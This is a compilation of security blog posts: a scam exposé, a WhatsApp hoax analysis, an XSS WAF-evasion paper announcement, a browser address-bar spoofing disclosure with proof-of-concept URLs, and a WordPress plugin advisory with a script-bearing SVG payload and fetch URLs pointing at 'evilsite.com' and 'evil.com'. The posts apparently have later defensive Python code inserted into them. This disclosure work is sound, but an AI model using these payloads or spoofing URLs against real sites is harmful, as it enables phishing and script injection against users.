
The Hacking Articles



Beware!! socialtrade.biz Scam Exposed !!

Posted: 20 Nov 2016 04:35 AM PST

Of course everyone wants to make easy money at home. Who wants to commute for an hour each way to a job in a major city? No one. That's why fraudsters take advantage of this and offer online work where you just click some links and make money from only 10-15 minutes of work a day. They target vulnerable demographic segments of the population, such as the elderly or the disadvantaged. And as bad as that is, they also trick highly educated and Internet-savvy people into believing that they can make money fast on these programs.

Many frauds take advantage of this, and you may lose your hard-earned money.

Guys, if you remember, in 2011 I also warned people about the Speak Asia scam, and you know what happened: those who did not believe it was a scam lost all their hard-earned money. Attention!! SpeakAsiaOnline Survey, Be Careful !!!

Socialtrade.biz is also a scam, and it is being nurtured by educated IT professionals and promoted by greedy elites who are members up the ladder and have no concern about the fallout and the resulting losses to thousands of people down the line.
Observe the rules below and you will see that it is a fraud.
1. Rs 5 per click to the employee, Rs 5 goes to the employer. Still, the employer asks for a joining fee, and a high one at that: 20000 to 50000.
2. Booster activation period: 20 days. Including holidays, that comes down to 15–16 days. Activation itself takes another 2–3 days, so it further comes down to 12–13 days. So you need to add 2 members in 12–13 days to activate the booster (which enhances your income per day).
3. Say you join and do not add any member down the leg. Then you will be stupidly clicking fake links for around 5 months to get your money back. As the company is a fraud, it can walk off with the money of all those members who enrolled in the last 5 months (and didn't spread this virus) on any date: today, next Sunday, or say your next birthday.
4. If you continue spreading it, you may recover your investment in 2 months (though the company says it is not an investment company and that the huge joining fee is just a token of appreciation for their kind service of manipulating the masses). But those down the line will have their money stuck in this scam.
5. So, if you see it now, it's like this: take the disease, but pass it as fast as you can to the next person (actually 2 members) down the line.
6. So the mantra for members: keep spreading the disease, bear the risk (and fear) of losing money for just 2 months (if you have done your service of spreading the virus to the next 2 fools), and thereafter enjoy the fruits of your (fake) attributes such as managerial skills, good convincing, risk bearing, blah-blah.
7. If you are a member, or if you become one, you will follow point 6 above (or have already trodden that path). But my request: first authenticate the claims put forward by the company. Is clicking paying the money, or is the money just being circulated from new members to old members? If it looks like a scam, stop yourself from supporting such a scam.
8. If you are not a member yet, read points 1–5 again. Then ask yourself whether you are okay with fooling (and looting) poor members (students, job seekers, low-earning fellows etc.) down the line. If yes, go on. Sites like Social Trade Biz are for the likes of you.

How they manipulate users:
• Each member pays a hefty amount of Rs. 57500/- to get membership.
• The member gets 125 links (mostly fake) to promote and earns Rs. 625 per day if the booster is not activated. (Booster means making 2 members down the leg.)
• 20 days are given to a new member to activate the booster.
• Down the leg, if 2 members join, the one at the top of them gets a booster income of Rs. 5000.
• So, say a new member pays Rs. 57500 and activates the booster in the next 15 days. The total payment to that member in the next 3 months = 15 days * 625 + 50 days * 1250 + 5000 (booster) = 71875 + 5000 = 76875
• Say the 2 new members down the leg do not make any other member. Payment to these 2 members in the next 2.5 months = 2 * 625 * 50 days = 62500
• Money still left with the company = 57500 * 3 - 76875 - 62500 = 33125.
• So for 3 members, the company has around 33000 with it even after around 2.5 months from the joining of the 2 members down the leg. As shown, the company has done nothing other than take money from lower members and give it to higher members.
• Say the company has 200000 members on some date. Then the company would have 100000 members at the bottom line who would have joined in the last 10-15 days.
• Money with the company from these 100000 members (considering only new-member money for now) = 57,500 * 1,00,000 = 5,75,00,00,000 (575 crore)
• The calculation is very easy now. Payments to those new members in the last 10 days = 10 * 625 * 1,00,000 = 62,50,00,000 (62.5 crore)
• So the company can run away with 500 crore on the day its membership reaches 200000. Some data shows it already has more than 1 lakh members. Do you still think it's not a SCAM?

Why is it spreading so fast then?
• Educated persons are leading the mission.
• Top members get huge amounts if new members are added fast.
• Also, members receive tablets, laptops etc. if they make some specific number of members down the leg within a limited period.
• Most important: observe the above carefully. The top member received Rs. 76875 in just 3 months. It means they recovered their contribution and also made profits (by looting members down the leg).

socialtrade.biz listed some legal documents for this business, but if you check, all these documents are for Ablaze Info Solutions, which deals in IT software solutions work.

Be wary if you have to pay money or supply your credit card number to a company in order to make money from these types of jobs. Some scammers make big promises about work-at-home opportunities, but with these you will lose all your hard-earned money.

In the Multi-Level Marketing (MLM) concept, only the people at the top of the chain make money.

So if you are one of the victims of this scam, stop investing your hard-earned money in it.

Stay Safe....

See the links below; Devbhoomi News exposed this scam:




User complaints:







Hacking and Cracking



Whatsapp 4G VIP SCAM - Technical Analysis

Posted: 06 Sep 2016 11:12 AM PDT


This is a short blog post describing a recent hoax pertaining to a "WhatsApp 4.0" version. I would like to clearly highlight that there is no such application as 'Whatsapp 4G'. The version promises users unrealistic features: video calling, new WhatsApp themes, deleting sent messages from both sides, etc.

The following is how the message is being propagated:


Technical Analysis 

Upon visiting the link you are taken to a page where you are asked to invite 15 friends before you can download the version. Upon clicking the invite button, it uses the WhatsApp URL scheme (whatsapp://) in order to send messages to your friends, so you end up promoting the hoax on behalf of the scammers:

The entire business logic is based upon the following client-side script - http://new-4g-whatsapp.ga/invite.js.

Upon examining invite.js, it was discovered that the code sets a cookie and checks on the client side whether 15 invites have been sent:



Once the counter has reached 15 invites or more, you are redirected to the download link:

In the above source code, if the value of c is greater than or equal to 15, window.location.href is set to the "ur" variable, which holds the following download link - http://ta3.co/new-4G-whatsapp/install.php

The installation link seems to be dead. Normally in such scams you would be asked to fill in surveys or install *free apps*, which are not really free, as they may ship with malware/adware.


Update (Whatsapp Gold)


A new variation of the WhatsApp 4G VIP scam has recently come to notice under the name "Whatsapp Gold", which works on the same principle as above. The only things that have changed are the interface design and the name.

Hacking and Cracking



Breaking The Great Wall of Web - XSS WAF Evasion CheatSheet

Posted: 01 Sep 2016 03:07 AM PDT


I think it's mandatory to give back to the security community from which we learn cutting-edge techniques and information. Therefore, after months of effort, I am presenting to you a new whitepaper titled "Breaking Great Wall of Web" without any strings attached.


Acknowledgements

I would like to thank the Acunetix Team for helping with proof-reading of the document.

Background



The whitepaper not only contains sophisticated XSS vectors but also aims at explaining the methodology behind bypassing a WAF. The previous paper on this subject, "Bypassing Modern WAF's XSS Filters - Cheat Sheet", was released 3 years back. A lot has changed and evolved during these years; especially with the advent of ECMAScript, a new horizon for evasion/obfuscation has opened. I have already discussed/demonstrated several techniques presented in this whitepaper in my recent webcast hosted by the Garage4hackers team, namely "Bypassing Modern WAF's Exemplified At XSS".

Abstract 



Input validation flaws such as XSS are the most prevalent security threats affecting modern web applications. In order to mitigate these attacks, Web Application Firewalls (WAFs) are used, which inspect HTTP requests for malicious transactions. Nevertheless, they can be easily bypassed due to the complexity of JavaScript in modern browsers. In this paper we discuss several techniques that can be used to circumvent WAFs, exemplified at XSS.

This paper will talk about the concepts of WAFs in general, identifying and fingerprinting WAFs, and various methodologies for constructing a bypass. The paper discusses well-known techniques such as brute forcing, regular expression reversing and browser bugs for bypassing WAFs.

Hacking and Cracking



Google Chrome, Firefox Address Bar Spoofing Vulnerability

Posted: 15 Aug 2016 11:29 PM PDT

Introduction

The Google security team themselves state that "We recognize that the address bar is the only reliable security indicator in modern browsers", and if the only reliable security indicator can be controlled by an attacker it can have adverse effects, for instance tricking users into supplying sensitive information to a malicious website, because they could easily be led to believe that the website they are visiting is legitimate since the address bar points to the correct website.
In my paper "Bypassing Browser Security Policies For Fun And Profit" I uncovered various address bar spoofing techniques as well as bugs affecting modern browsers. In this blog post I discuss yet another "Address Bar Spoofing" vulnerability affecting Google Chrome's Omnibox. The Omnibox is a customized address bar API developed for a better user experience, with features such as search suggestions, URL prediction, instant search and so on.

Technical Details

Characters from languages such as Arabic and Hebrew are displayed in RTL (Right To Left) order. Due to the mishandling of several Unicode characters such as U+FE70, U+0622, U+0623 etc., and how they are rendered in combination with the first strong character, a URL starting with an IP address or alphabetic characters could be displayed spoofed. It was noticed that placing neutral characters such as "/" and "ا" in the file path causes the URL to be flipped and displayed from right to left. However, in order for the URL to be spoofed, the URL must begin with an IP address followed by neutral characters, as the Omnibox considers an IP address to be a combination of punctuation and numbers, and since LTR (Left To Right) direction is not properly enforced, this causes the entire URL to be treated and rendered from RTL (Right To Left). However, it doesn't have to be an IP address; what matters is that the first strong character (generally, an alphabetic character) in the URL must be an RTL character.

Logical Order

The following is the logical order of the characters in memory. Note that the Omnibox removes "http://" and displays the string without the "http://" prefix.

127.0.0.1/ا/http://example.com

Display Order

The following is the display order of characters after the browser removes the leading "http://", decodes the percent-escaped bytes, and applies the bidirectional algorithm.

http://example.com/‭ا/127.0.0.1

Steps To Reproduce

1) Visit the following link for the vulnerable browser - http://182.176.65.7/%EF%B9%B0/http://google.com/test

2) You will notice that the URL has been flipped from right to left and the browser displays http://google.com/test/182.176.65.7 while it shows the content from the IP address.



The IP address part can easily be hidden, especially on mobile browsers, by using a long URL (google.com/fakepath/fakepath/fakepath/... /127.0.0.1) in order to make the attack look more realistic. To make it even more convincing, a Unicode version of a padlock can be used to suggest the presence of SSL.

Firefox Mobile Address Bar Spoofing CVE-2016-5267

Firefox was also prone to a similar vulnerability; however, this did not require an IP address to trigger. All it required was Arabic RTL characters, in which case I provided an Arabic TLD (عربي.امارات) in order to trigger the vulnerability, which resulted in

Proof of concept 

http://عربي.امارات/google.com/test/test/test


As you can see from the above screenshot, the page is hosted on عربي.امارات, however the address bar points to google.com.

Important Note

Variations of this vulnerability have also been discovered in several other browsers that are still undergoing a fix, therefore I am refraining from disclosing them. Details will be disclosed once a fix has landed.

Fix

RFC 3987 § 4.1 states that "Bidirectional IRIs MUST be rendered in the same way as they would be if they were in a left-to-right embedding."; therefore, setting the paragraph direction to LTR fixes this issue. This is a known issue and has already been discussed in great detail here.
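A Python model of the mechanism described under Technical Details and of the fix above, added here as an example (it is not code from the post or from any browser): it finds the first strong character of the displayed string the way UAX #9 does, flags URLs whose paragraph would resolve right-to-left, and shows that forcing LTR removes the flip. The omnibox_view() pre-processing and the use of U+200E as a stand-in for setting the paragraph direction are my simplifications.

```python
import unicodedata
from typing import Optional
from urllib.parse import unquote

# Strong bidi classes (UAX #9): "L" is left-to-right, "R" and "AL" are right-to-left.
STRONG_LTR = {"L"}
STRONG_RTL = {"R", "AL"}


def first_strong_direction(text: str) -> Optional[str]:
    """Bidi class of the first strong character ('L', 'R' or 'AL'), or None.

    Digits are class EN and ".", "/", ":" are CS, so an IP address such as
    "127.0.0.1/" contributes no strong character and is skipped over.
    """
    for ch in text:
        cls = unicodedata.bidirectional(ch)
        if cls in STRONG_LTR or cls in STRONG_RTL:
            return cls
    return None


def omnibox_view(url: str) -> str:
    """Simplified model of the pre-processing the post describes: the scheme is
    dropped and percent-escapes are decoded before the bidi algorithm runs."""
    for prefix in ("http://", "https://"):
        if url.startswith(prefix):
            url = url[len(prefix):]
            break
    return unquote(url)


def paragraph_direction(shown: str) -> str:
    """UAX #9 rules P2/P3: with no explicit direction the paragraph follows its
    first strong character (LTR when there is none)."""
    return "RTL" if first_strong_direction(shown) in STRONG_RTL else "LTR"


def is_spoof_candidate(url: str) -> bool:
    """True when the displayed string would be laid out right-to-left, i.e. the
    first strong character after scheme stripping is an RTL letter."""
    return paragraph_direction(omnibox_view(url)) == "RTL"


def force_ltr(shown: str) -> str:
    """Mitigation stand-in: prepend U+200E LEFT-TO-RIGHT MARK, an invisible
    strong-L character, so the first strong character is always L. The real
    fix is to set the paragraph direction to LTR (RFC 3987 section 4.1); the
    mark only makes that effect visible on a plain string."""
    return "\u200e" + shown
```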

Credits

I am highly indebted to "Matt Giuca" from the Google Chrome team for his extensive help on this issue and "Tod Beardsley" for handling the disclosure.

Bug Bounty 

The total bounty rewarded for all bugs combined was 5000$.

Hacking and Cracking



Wordpress Mobile Detector Incorrect Fix Leads To Stored XSS

Posted: 13 Jun 2016 03:30 AM PDT


Recently, the WordPress Mobile Detector plugin was in the news for the "Remote Code Execution" vulnerability that was found inside the resize.php file. The vulnerability allowed an external attacker to upload arbitrary files to the server, as there was no validation of the type of file being retrieved from an external source.

Soon after the vulnerability became public, the plugin was taken down from the WordPress directory until the issue was fixed. However, as per my analysis the fix is incomplete and leads to stored XSS.

The Vulnerability

Let's discuss the initial vulnerability first. The following PHP code takes input via the src parameter (GET or POST) and checks for the existence of the file. If it exists, the appropriate Content-Type header is set.

Code

<?php
if (isset($_REQUEST['src'])) {
    $path = dirname(__FILE__) . "/cache/" . basename($_REQUEST['src']);
    if (file_exists($path)) {
        // ... (elided in the original) the cached file is served with its Content-Type header ...
    }
    // ...
    // No check on the file type: whatever the remote URL returns is written into cache/
    file_put_contents($path, file_get_contents($_REQUEST['src']));
}
?>

It then utilizes the file_get_contents function in order to fetch the file contents from a URL and save them on the web host under the cache directory. Please note that this is only possible if allow_url_fopen is enabled on the server, which limits the effectiveness and impact of the exploit. The problem with the above code is that it does not perform any check on which extensions are allowed. So, in case one can fetch and execute PHP or ASPX code, it results in code execution.

The (incomplete) Fix

The following fix was implemented, which defines a whitelist of all acceptable extensions (primarily images). The code checks whether the requested file ends with a whitelisted extension before it is fetched and uploaded.

<?php
// ... (elided in the original) $path is built from basename($_REQUEST['src']) as before ...
$acceptable_extensions = ['png','gif','jpg','jpeg','jif','jfif','svg'];
$info = pathinfo($_REQUEST['src']);
// Check file extension ("svg" is still on the list, and an SVG can carry script)
if (in_array($info['extension'], $acceptable_extensions)) {
    file_put_contents($path, file_get_contents($_REQUEST['src']));
}
?>

The problem with the above fix is that it whitelists the "svg" extension. It is a widely known fact that SVG images can execute JavaScript.

Using SVG To Trigger Stored XSS

In order to demonstrate the finding, the following SVG file would be hosted on a remote server.

test.svg

<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>

Once requested via the "src" parameter, this image will be saved to the cache directory:

http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=evilsite.com/test.svg

Upon visiting the uploaded image: 

http://www.example.com/wp-content/plugins/wp-mobile-detector/cache/test.svg


Other Attack Possibilities

i) In case the path finishes with an allowed extension there is an attack possibility - victim.com/test.php/test.jpg.

ii) In older versions of PHP, it is possible to append a null byte and trick the server into uploading a malicious PHP file. Example - http://evil.com/malicious.php.svg

iii) In case display_errors is set to true in the php.ini file, the file_get_contents() function can be utilized for . A similar issue was discovered by me in 2013. You can refer to the following blog post - phpThumb Server Side Request Forgery


v) Even just allowing external users to fetch and upload external images might introduce issues: someone could host porn images and tarnish the company's reputation; someone could deliberately upload a copyrighted image and sue the company; and since there is no limit to the number of images one can upload, one could attempt to exhaust server resources by uploading tons of images.

Suggested Fix For Vendor 

i) The suggested fix is removing the "svg" extension from the whitelist:

$acceptable_extensions = ['png','gif','jpg','jpeg','jif','jfif'];

ii) File names should be rewritten after upload so that their location cannot be guessed, and directory listing should also be disabled.

Suggested Fix For Webmasters

iii) Server administrators should modify the .htaccess file to only serve allowed extensions and prevent access to other files.

iv) The X-Content-Type-Options: nosniff header should be set to prevent exploiting the site using, for example, an SWF file with a .jpg extension - https://github.com/nccgroup/CrossSiteContentHijacking.

v) Content-Disposition header should be utilized.
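The vendor and webmaster suggestions above, modelled in Python as an added example (this is not the plugin's code; it reimplements the logic rather than patching the PHP): the allow-list without svg, a magic-byte check so the stored bytes must really be the image the extension claims, an unguessable file name, and the nosniff and Content-Disposition headers for serving a cached file. The function names and the set of signatures are my choice.

```python
import os
import secrets
from typing import Optional, Tuple
from urllib.parse import urlparse

# The vendor allow-list with "svg" removed: SVG is XML and can carry onload/<script>.
ALLOWED_EXTENSIONS = {"png", "gif", "jpg", "jpeg"}
CANONICAL = {"jpeg": "jpg"}
# Leading bytes of the formats we will store; checking content, not only the name,
# defeats "malicious.php.svg" or "test.php/test.jpg" style names.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
}
MIME = {"png": "image/png", "gif": "image/gif", "jpg": "image/jpeg"}


def extension_from_url(src: str) -> str:
    """Lower-cased, canonical extension of the last path segment (query and
    fragment ignored, so "x.php?y=.png" does not count as png)."""
    if "://" not in src:
        src = "http://" + src  # the plugin accepted scheme-less values
    ext = os.path.splitext(os.path.basename(urlparse(src).path))[1]
    ext = ext.lstrip(".").lower()
    return CANONICAL.get(ext, ext)


def sniff_image_type(data: bytes) -> Optional[str]:
    for kind, signatures in MAGIC.items():
        if any(data.startswith(sig) for sig in signatures):
            return kind
    return None


def validate_fetched_image(src: str, data: bytes) -> Tuple[Optional[str], str]:
    """Return (stored_name, reason); stored_name is None when the bytes must not
    be written to cache/. On success the name is random and unguessable and
    carries only the sniffed image extension (fix ii: no caller-chosen names)."""
    ext = extension_from_url(src)
    if ext not in ALLOWED_EXTENSIONS:
        return None, "extension not allowed"
    kind = sniff_image_type(data)
    if kind is None:
        return None, "content is not a supported image"
    if kind != ext:
        return None, "content does not match extension"
    return f"{secrets.token_hex(16)}.{kind}", "ok"


def response_headers_for(stored_name: str) -> dict:
    """Headers for serving a cached file (fixes iv and v): explicit image type,
    no MIME sniffing, and a download disposition so the bytes are never
    rendered as a document inside the site's origin."""
    kind = stored_name.rsplit(".", 1)[-1]
    return {
        "Content-Type": MIME[kind],
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{stored_name}"',
    }
```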

Thanks to Soroush Dalili from NCC Group and Daniel Cid from Sucuri for the tip-off.